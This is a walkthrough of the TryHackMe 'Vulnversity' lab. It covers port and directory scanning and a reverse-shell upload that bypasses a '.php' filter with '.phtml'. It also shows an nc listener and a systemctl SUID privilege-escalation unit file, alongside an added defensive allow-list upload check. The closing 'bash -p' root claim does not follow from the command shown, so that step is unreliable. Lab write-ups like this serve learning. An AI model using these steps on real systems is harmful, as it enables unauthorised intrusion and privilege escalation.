Vulnversity — TryHackMe
[Task 1] — Deploy the machine
[Task 2] Reconnaissance
Gather information about this machine using a network scanning tool called nmap.
nmap is a free, open-source and powerful tool used to discover hosts and services on a computer network. In this example, we use nmap to scan the machine and identify the services running on each port. nmap has many capabilities; below is a table summarising some of the functionality it provides.
Syntax: nmap -sV <machine ip>
4. How many ports will nmap scan if the flag -p-400 is used?
5. Using the nmap flag -n what will it not resolve?
Answer: dns
6. What is the most likely operating system this machine is running?
7. What port is the web server running on?
[Task 3] Locating directories using GoBuster
gobuster dir -u http://<ip>:3333 -w <word list location>
This found an interesting directory: /internal
[Task 4] Compromise the webserver
- Try uploading a few file types to the server; what common extension seems to be blocked?
I uploaded a PHP reverse shell, but it was not allowed.
- Upload “reverse_shell.phtml”
Success
Verify the upload result in “/internal/uploads/”.
On the attacker’s machine, type
nc -lvnp 9001
Click on the uploaded file.
cat /etc/passwd
Now change directory to bill’s home: cd /home/bill
cat user.txt and you will have the user flag.
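As an added example (not code from the original writeup or from the room’s target server), the check below contrasts the deny-list behaviour observed above, where blocking “.php” still lets “reverse_shell.phtml” through, with an allow-list check that does not have that gap; the allowed extensions are an assumed policy for the demonstration.

```python
import os
import secrets
from pathlib import PurePosixPath

# Added example, not the room's own code. Shows why a deny-list that only
# blocks ".php" still accepts "reverse_shell.phtml", and what an allow-list
# check looks like. ALLOWED is an assumed policy for the demonstration.
BLOCKED = {".php"}
ALLOWED = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}


def denylist_accepts(filename: str) -> bool:
    """The weak check: only an exact, lower-case '.php' suffix is refused.
    '.phtml', '.PHP', '.php5' and 'shell.php.jpg' are all accepted."""
    return PurePosixPath(filename).suffix not in BLOCKED


def allowlist_accepts(filename: str) -> bool:
    """The hardened check:
    - bare file name only (no directory components, no control characters)
    - exactly one extension, so 'shell.php.jpg' and 'a.phtml.png' are refused
    - extension compared case-insensitively against the allow-list
    """
    if not filename or any(ord(c) < 32 for c in filename):
        return False
    if os.path.basename(filename.replace("\\", "/")) != filename:
        return False
    if filename in (".", ".."):
        return False
    p = PurePosixPath(filename.lower())
    if len(p.suffixes) != 1 or p.stem == "":
        return False
    return p.suffix in ALLOWED


def stored_name(filename: str) -> str:
    """Server-side name for an accepted upload: a random token plus the
    validated extension, so the client never chooses the on-disk name."""
    if not allowlist_accepts(filename):
        raise ValueError("rejected upload: " + repr(filename))
    return secrets.token_hex(16) + PurePosixPath(filename.lower()).suffix
```

Storing uploads outside the web root, or in a directory where the server has script execution disabled, closes the remaining gap even if a validation bug slips through.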
[Task 5] Privilege Escalation
- On the system, search for all SUID files. What file stands out?
Reference: https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
2. Become root and get the last flag (/root/root.txt)
Reference:
- https://gtfobins.github.io/gtfobins/systemctl/
- https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
eop=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $eop
/bin/systemctl link $eop
/bin/systemctl enable --now $eop
After running that command from GTFOBins, run bash -p.
Yupeee, we have root. Hope it will be helpful.